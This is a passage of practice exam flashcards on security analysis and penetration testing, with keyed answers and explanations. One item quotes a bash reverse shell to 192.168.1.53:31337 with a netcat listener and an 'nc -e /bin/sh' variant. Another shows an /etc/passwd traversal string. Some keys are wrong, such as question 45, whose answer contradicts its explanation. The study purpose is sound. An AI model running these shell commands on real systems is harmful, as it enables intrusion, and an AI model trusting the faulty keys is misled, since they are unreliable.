OBJ-3.5: The deck keys this scenario to an unsecure sudo vulnerability. The find command lists setuid files: -perm +4000 matches files with the SUID bit (octal 4000) set (this is the old GNU find syntax; current versions use -perm -4000 or -perm /4000), -user root restricts the results to files owned by root, -type f to regular files, and -print displays them. Four setuid-root files are found, including /usr/bin/sudo, and the tester then runs chmod 4111 against it. Two points are worth knowing beyond the deck's reasoning. First, sudo is setuid root by design (its normal mode is 4755, rwsr-xr-x), so finding it in this list is expected, and every user on the system can already execute it; 4111 (rws--x--x) only removes the read bits and is not itself an escalation. Second, changing the mode of a root-owned binary requires being root already (note the # prompt), so this command tampers with a system binary after access has been gained rather than obtaining it. In practice, the setuid binaries worth scrutinizing in such a listing are the unexpected ones (here /usr/games/mahjong), and real "unsecure sudo" findings are sudoers misconfigurations, such as NOPASSWD rules or permitted commands that can spawn a shell or write arbitrary files, that let an unprivileged user reach root.

19
Q

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?

A.Automated patch deployment
B.Log consolidation
C.Intrusion prevention system
D.Anti-virus software

A

C.Intrusion prevention system

Explanation:
OBJ-2.5: Because the question focuses on the ICS/SCADA network, the best choice among those listed is an intrusion prevention system. ICS/SCADA equipment is driven by a narrow, predictable set of protocol commands, so strict IPS rules can be written to block any unexpected command or connection. One practical caveat: many ICS teams first deploy such a system in passive (IDS) mode and move to inline blocking only once the rules are tuned, because a false positive that blocks a legitimate control message can halt a physical process. Log consolidation is a good idea but does not prevent anything, so it is not the most critical control to add first. Automated patch deployment should not be used here, because ICS/SCADA patches must be tested before installation; patches often break ICS/SCADA functionality. Anti-virus software may not be able to run on the equipment at all, since many ICS/SCADA systems do not use standard operating systems such as Windows.

20
Q
What role does the red team perform during a tabletop exercise (TTX)?
A.Adversary
B.Cybersecurity analyst
C.System Administrator
D.Network defender
A

A.Adversary

Explanation:
OBJ-1.3: The red team acts as the adversary, attempting to penetrate the network or exploit it as a rogue internal attacker. The red team might be selected members of in-house security staff, a third-party company, or a consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.

21
Q
You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize?
A.Spoofing
B.Tailgating
C.Shoulder surfing
D.Impersonation
A

B.Tailgating

Explanation:
OBJ-3.6: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.

22
Q

You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command.
Which of the following types of exploits are you attempting?
A.Credential brute forcing
B.Sandbox escape
C.Pass the hash
D.Credentials harvesting

A

C.Pass the hash

Explanation:
OBJ-4.3: A pass-the-hash attack is a network-based attack in which the attacker steals hashed user credentials and uses them as-is to authenticate to other systems on the same network. In Windows NTLM authentication, the client never sends the password; it proves knowledge of the password's NT hash in a challenge-response exchange, so whoever holds the hash can authenticate as that user without ever knowing or cracking the plaintext password. Metasploit's psexec module supports this directly: the key to answering this question is noticing that the SMBPass option has been set to a user's password hash (in LM:NT form) rather than a password, which the module then uses to authenticate to the target over SMB.

23
Q

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?
A.Hardening the DEV_SERVER7 server
B.Logically isolate the PAYROLL_DB server from the production network
C.Conduct a Nessus scan of the FIREFLY server
D.Conduct a data criticality and prioritization analysis

A

D.Conduct a data criticality and prioritization analysis

Explanation:
OBJ-2.3: While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident occurs, it is good practice to conduct a data criticality and prioritization analysis to determine which assets are critical to business operations and need to be prioritized for protection; once an intrusion occurs, that information guides which assets to protect and defend first. Since the question states the analyst is trying to decide which server to look at based on its name, it is clear this organization never performed such an analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems; for example, how do we know DEATHSTAR doesn't host the credit card processing systems that would be a more lucrative target for APT 38 than PAYROLL_DB? Hardening, logically isolating, or vulnerability scanning a particular server would be random guesses, since the analyst doesn't know which data they should focus on protecting or where the attacker currently is.

24
Q

What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should ignore any remaining risk
C.You should continue to apply additional controls until there is zero risk
D.You should remove the current controls since they are not completely effective

A

A.You should accept the risk if the residual risk is low enough

Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.

25
Q
Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary's computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary's computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary?
A.Evil twin
B.IP Spoofing
C.ARP cache poisoning
D.MAC Spoofing
A

C.ARP cache poisoning

Explanation:
OBJ-3.2: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.

26
Q

What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan that scans ports 80 and 443
B.A stealth scan that scans all open ports excluding ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system
D.A stealth scan that scans ports 80 to 443

A

C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system

Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.

27
Q

A penetration tester just entered the following command into a Bash shell on Dion Training’s server:

-=-=-=-=-=-
bash 1>& /dev/tcp/192.168.1.53/31337 0>&1
-=-=-=-=-=-

Before the penetration tester runs that command, what must they run first on their machine?
A.nc -nlvp 31337
B.nc 192.168.1.53 31337
C.bash 0>& /dev/tcp/127.0.0.1/31337 1>&0
D.nc -e /bin/sh 192.168.1.53 31337
A

A.nc -nlvp 31337

Explanation:
OBJ-4.3: The bash command entered by the penetration tester on the Dion Training server is a redirector that sends information back to a listener. Therefore, the penetration tester needs to first set up a listener on their own machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nlvp 31337). The bash command says to redirect the standard output (1) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could be configured using crontab to run this Bash command every day at a certain time, as well.

28
Q

Which of the following vulnerabilities is the greatest threat to data confidentiality?
A.SSL Server with SSLv3 enabled vulnerability
B.HTTP TRACE/TRACK methods enabled
C.phpinfo information disclosure vulnerability
D.Web application SQL injection vulnerability

A

D.Web application SQL injection vulnerability

Explanation:
OBJ-5.1: Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system’s data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn’t disclose any information about the data stored within the system, though, so it isn’t a great threat to our data’s confidentiality.

29
Q

What tool is used to collect wireless packet data?

A.Netcat
B.John The Ripper
C.Aircrack-ng
D.Nessus

A

C.Aircrack-ng

Explanation:
OBJ-4.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

30
Q

Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend they implement first?
A.Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
B.Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
C.Ensure that all screen capture content is visibly watermarked
D.Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute

A

B.Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game

Explanation:
OBJ-5.3: Ensuring that each console has its own unique key will allow the console manufacturer to track who has purchased which games when using digital rights management licensing. This can be achieved using a hardware root of trust, such as a TPM module in the processor. While encrypting the games during distribution will provide some security, the games could be decrypted and distributed by unauthorized parties if the encryption key were ever compromised. The recommendation of making the game arbitrarily large will frustrate both authorized and unauthorized users, which could negatively impact sales, so it is a poor recommendation to implement. Visibly watermarking everything will only aggravate the user, provide a negative customer experience, and not help fight software piracy.
31
Q
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO)
A.Patching
B.NIDS
C.Disabling unused services
D.Segmentation
A

C.Disabling unused services
D.Segmentation

Explanation:
OBJ-2.5: Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.

32
Q

During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance’s operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability?
A.Mark the identified vulnerability as a false positive
B.Try to gain access to the underlying operating system and install the patch
C.Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability

A

D.Contact the vendor to provide an update or to remediate the vulnerability

Explanation:
OBJ-5.3: You should contact the vendor to determine if a patch is available for installation. Since this is a vendor-supported appliance installed under a service contract, the vendor is responsible for the appliance’s management and security. You should not attempt to gain access to the underlying operating system to patch the vulnerability yourself, as this could void your warranty and void your service contract. Based on the information provided, there is no reason to believe that this is a false positive, either. You should not simply wait 30 days and rerun the scan, as this is a non-action. Instead, you should contact the vendor to fix this vulnerability. Then, you could rerun the scan to validate they have completed the mitigations and remediations.

33
Q
A project lead reviews the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The work statement specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure. Based on this scope of work, what type of activity is to be performed?
A.Vulnerability scanning
B.Social Engineering
C.Penetration testing
D.Session hijacking
A

C.Penetration testing

Explanation:
OBJ-1.3: Penetration testing is the act of using a computer system, an individual network, or another application to find vulnerabilities that an attacker could use to compromise your systems. Penetration testing can also find vulnerable endpoints that enlarge the attack surface.

34
Q
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered?
A.White Box
B.Red Box
C.Black Box
D.Gray Box
A

C.Black Box

Explanation:
OBJ-1.3: In a black box assessment, the penetration tester takes an average hacker’s role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.

35
Q
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and impacts the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?
A.Syslog
B.Network Mapping
C.Firewall Logs
D.NIDS
A

A.Syslog

Explanation:
OBJ-2.2: The Syslog server is a centralized log management solution. By looking through the Syslog server’s logs, the technician could determine which service failed on which server since all the logs are retained on the Syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could help determine which server was offline, but not what caused the interruption. Firewall logs would only help determine why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.

36
Q

You are conducting a penetration test against the Dion Training test server. You have just run nikto against the server and received the results below:

-=-=-=-=-=-
root@DionTraining:~# nikto -h test.diontraining.com
- Nikto v2.1.6
—————————————————————————
+ Target IP: 164.201.54.34
+ Target Hostname: test.diontraining.com
+ Target Port: 80
+ Start Time: 2020-12-22 13:43:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2c39 0x53a938fc104ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7596 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-08-22 06:54:44 (GMT8) (1291 seconds)
—————————————————————————
+ 1 host(s) tested
-=-=-=-=-=-

Based on the results above, which of the following exploits should you develop for this engagement?
A.Arbitrary Code Execution
B.Privilege Escalation
C.SQL Injection
D.Clickjacking
A

D.Clickjacking

Explanation

OBJ-3.4: The X-Frame-Options in the HTTP response header can be used to indicate whether or not a browser should be allowed to open a page in frame or iframe. If the X-Frame-Options header is not present, then a clickjacking exploit could be used against the web server’s users. The only two vulnerabilities shown in the Nikto results are the clickjacking vulnerability and the MIME Type security issue.

37
Q

Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne’s existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application:

-=-=-=-=-=-
https://www.whamiedyne.com/app/accountInfo?acct=12345
-=-=-=-=-=-

You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following type of vulnerabilities or threats have you discovered?
A.Insecure Direct Object Reference
B.SQL Injection
C.Race Condition
D.XML Injection
A

A.Insecure Direct Object Reference

Explanation:
OBJ-3.4: This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. An attacker can modify one or more of these four basic functions in a SQL injection attack by adding code to some input within the web app, causing it to execute the attacker’s own set of queries using SQL. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the developer’s order and timing, which is not the case in this scenario.

38
Q

(This is a simulated performance-based question.)

You have been asked to help conduct a white box penetration test. As part of your preparations, you have been given the source code for the organization’s custom web application.

-=-=-=-=-=-
Linux:~ diontraining$ cat DionCode.c

#include <string.h>

/* Deliberately vulnerable: varX is copied into a fixed 20-byte stack buffer
   with no length check, so any input longer than the buffer overflows it. */
void DionCode (char *varX)
{
    char user_input[20];
    strcpy (user_input, varX);
}
-=-=-=-=-=-
Which type of vulnerability might an attacker be able to exploit in the code shown above?
A.SQL Injection
B.Buffer Overflow
C.JavaScript Injection
D.Remote Code Execution
A

B.Buffer Overflow

Explanation:
OBJ-3.4: The function DionCode may be subject to a buffer overflow as the user enters something over 20 characters as their input. In defining the char (character) type array, the programmer only allocated 20 characters worth of memory storage. To solve this problem, the programmer should create proper input validation to ensure that the input is less than 20 characters before passing the user_input variable to the strcpy (string copy) function.

39
Q
You have been hired to perform a penetration test against Dion Training's new voucher fulfillment web application. After presenting your findings to the client, they ask you to also perform a static code analysis of the application, add input sanitization to the code, and correct the web application firewall's configuration before they accept your final report. Which of the following has occurred?
A.Scope Creep
B.Tolerance to Impact
C.Postmortem Review
D.Goal Reprioritization
A

A.Scope Creep

Explanation:
OBJ-1.3: Scope creep is the condition that occurs when a client requests additional services after a SOW has been signed, and the project scope has been documented. This is not a condition that is limited to penetration testing, either. Practically every project manager or building contractor can provide examples of scope creep that happened with various projects. The big problem with scope creep is that it takes resources away from those documented in the SOW. It can also become a source of contention when it comes time to bill the client or complete the engagement.

40
Q

Which type of threat will patches NOT effectively combat as a security control?
A.Discovered software bugs
B.Known Vulnerabilities
C.Zero-day Attacks
D.Malware with defined indicators of compromise

A

C.Zero-day Attacks

Explanation:
OBJ-5.3: Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, a patch or mitigation is normally available. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.

41
Q

A recent vulnerability scan found several vulnerabilities on an organization’s public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?
A.An HTTP response that reveals an internal IP address
B.A cryptographically weak encryption cipher
C.A buffer overflow that is known to allow remote code execution
D.A website utilizing a self-signed SSL certificate

A

C.A buffer overflow that is known to allow remote code execution

Explanation:
OBJ-2.3: The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to prevent a security breach most effectively. While the other issues should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.

42
Q
A penetration tester is using a known vulnerability to compromise an Apache web server. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ?
A.Installing additional tools
B.Patching
C.Vulnerability scanning
D.Privilege escalation
A

D.Privilege escalation

Explanation:
OBJ-3.5: Apache web servers are run as a limited user by default, not as an administrative or root account. To be efficient and effective, the penetration tester should attempt to conduct a privilege escalation before pivoting into the DMZ. As a penetration tester, they would not likely patch the system, conduct a vulnerability scan, or install additional tools. This does not help them achieve their goal of pivoting into the DMZ.

43
Q
Dion Training has hired you to assess its voucher fulfillment REST API on its e-commerce website. Which of the following support resources would be MOST helpful in your assessment?
A.Swagger document
B.XSD File
C.WSDL document
D.SDK Documentation
A

A.Swagger document

Explanation:
OBJ-1.1: A Swagger document is the REST API equivalent of a WSDL document that defines a SOAP-based web service. Since Dion Training’s voucher fulfillment system uses a REST API, you should request a copy of the Swagger document to conduct a more efficient assessment of their web application.

44
Q

You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability:

You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding?
A.False positive
B.True positive
C.False negative
D.True Negative
A

A.False positive

Explanation:
OBJ-2.3: You should categorize the results as a false positive. Based on the scenario and output, your server is not vulnerable to a remote code execution for the identified vulnerability. You are already running MySQL v3.5.3, which is greater than v3.3.x. This indicates that the vulnerability scanner falsely identified your MySQL version as an earlier and more vulnerable version. The system incorrectly identified a vulnerability, but the vulnerability doesn’t exist on your system. Therefore, this is a false positive.

45
Q

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?
A.Permit 143.27.43.32 161.212.71.0/24 RDP 3389
B.Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
C.Permit 143.27.43.0/24 161.212.71.0 RDP 3389
D.Permit 143.27.43.0 161.212.71.0 RDP 3389

A

D.Permit 143.27.43.0 161.212.71.0 RDP 3389

Explanation:
OBJ-5.3: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.

46
Q
You are scheduled to conduct a physical penetration test against an organization. You need to access the building after business hours when none of the employees are on-site. Which of the following methods would be the MOST effective to utilize?
A.Dumpster Diving
B.Fence Jumping
C.Lock Picking
D.Tailgating
A

C.Lock Picking

Explanation:
OBJ-3.6: Since there are no employees around, the most effective method would be to pick a lock on a door to enter the building. Lock picking is a skill, and a penetration tester requires practice with the right tools to be effective at it.

47
Q

A coworker sent you the following Bash script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=-
#!/bin/bash
# Prompt for a target range, then SYN-scan ports 80 and 443 on it
echo "Enter an IP range: "
read IPrange
nmap -sS $IPrange -p80,443 -oG tempfile
# Keep only the greppable lines that report an open port
cat tempfile | grep open > tempfile1
# Trim each line down to the host's IP address and overwrite tempfile
cat tempfile1 | cut -f2 -d":" | cut -f1 -d"(" > tempfile
rm tempfile1
cat tempfile
-=-=-=-=-=-
During the upcoming engagement, what should you use this script to perform?
A.Debugging an exploit
B.Reconnaissance
C.Collecting Logs
D.Scheduling Tasks
A

B.Reconnaissance

Explanation:
OBJ-4.4: This simple Bash script is only 9 lines in length, but it creates a decent reconnaissance tool. The script asks the user for the starting and ending IP addresses to scan and then performs a nmap scan on each IP address to see if ports 80 and 443 are open. It logs this information to a greppable file called tempfile and then performs some filtering as it passes the data from tempfile to tempfile1. It then cleans up the format and overwrites the original tempfile. Then, it removes the tempfile1 that was used, leaving only the tempfile. Finally, it displays the tempfile to the screen, showing only the IP addresses with clients that have either port 80 or port 443 open.

48
Q
Which of the following is exploited by an SQL injection to give the attacker access to a database?
A.Web Application
B.Firewall
C.Database Server
D.Operating System
A

A.Web Application

Explanation:
OBJ-3.4: SQL injections target the data stored in enterprise databases by exploiting flaws in client-facing applications. These vulnerabilities being exploited are most often found in web applications. The database server or operating system would normally be exploited by a remote code execution, a buffer overflow, or another type of server-side attack. The firewall would not be subject to an SQL injection.

49
Q

You are conducting a review of a VPN device’s logs and found the following URL being accessed:

-=-=-=-=-=-
https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/
-=-=-=-=-=-

Based upon this log entry alone, which of the following most likely occurred?
A.The /etc/passwd file was downloaded using a directory traversal attack
B.An SQL Injection attack caused the VPN server to return the password file
C.An XML Injection attack caused the VPN server to return the password file
D.The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted

A

D.The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted

Explanation:
OBJ-3.4: The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the /etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.

50
Q

You are conducting a grep search on a log file using the following REGEX expression:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,6}\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following strings would be included in the output of the search?
A.jason.dion@diontraining.com
B.jason_dion@dion.training.com
C.support@diontraining.com
D.www.diontraining.com
A

C.support@diontraining.com

Explanation:
OBJ-4.4: In the above REGEX, the \b anchor indicates that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]+) is composed of upper- or lower-case alphanumeric characters plus the symbols _ % + -. After the first part of the word and the at sign (@) is specified, it is followed by another word ([A-Za-z0-9.-]+), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.

51
Q
Your organization has recently been the target of a spearphishing campaign. You have identified the website associated with the link in the spearphishing emails and want to block it. Which of the following techniques would be the MOST effective in this situation?
A.URL Filter
B.Quarantine
C.Containment
D.Application Blacklist
A

A.URL Filter

Explanation:
OBJ-5.3: A URL filter can be used to block a website based on its website address or universal resource locator (URL). This is not a containment technique but a blocking and filtering technique. Quarantine would be used against an infected machine, and it would not be effective against trying to block access to a given website across the entire organization. An application blacklist is used to prevent an application from running, so this cannot be used to block a single malicious or suspicious website or URL.

52
Q

Your organization’s primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report still showing the servers as vulnerable? (SELECT ALL THAT APPLY)
A.The vulnerability assessment scan is returning a false positive
B.This critical patch did not remediate the vulnerability
C.You conducted the vulnerability scan without waiting long enough after the patch was installed
D.The wrong IP Address range was scanned during your vulnerability assessment

A

A.The vulnerability assessment scan is returning a false positive
B.This critical patch did not remediate the vulnerability

Explanation:
OBJ-2.3: There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which it is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, extremely critical patches are sometimes rushed into production, and the patch does not actually remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning, and it is assumed that you are scanning the same IP range both times since you have verified your scan configuration.

53
Q

A cybersecurity analyst is analyzing an employee’s workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proto Local Address Foreign Address State
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED
TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED
TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED
TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this output, which of the following entries is suspicious? (SELECT THREE)
A.TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
B.TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED
C.TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
D.TCP 0.0.0.0:53 0.0.0.0 LISTENING
E.TCP 0.0.0.0:135 0.0.0.0
F.TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED

A

C.TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
D.TCP 0.0.0.0:53 0.0.0.0 LISTENING
F.TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED

Explanation:
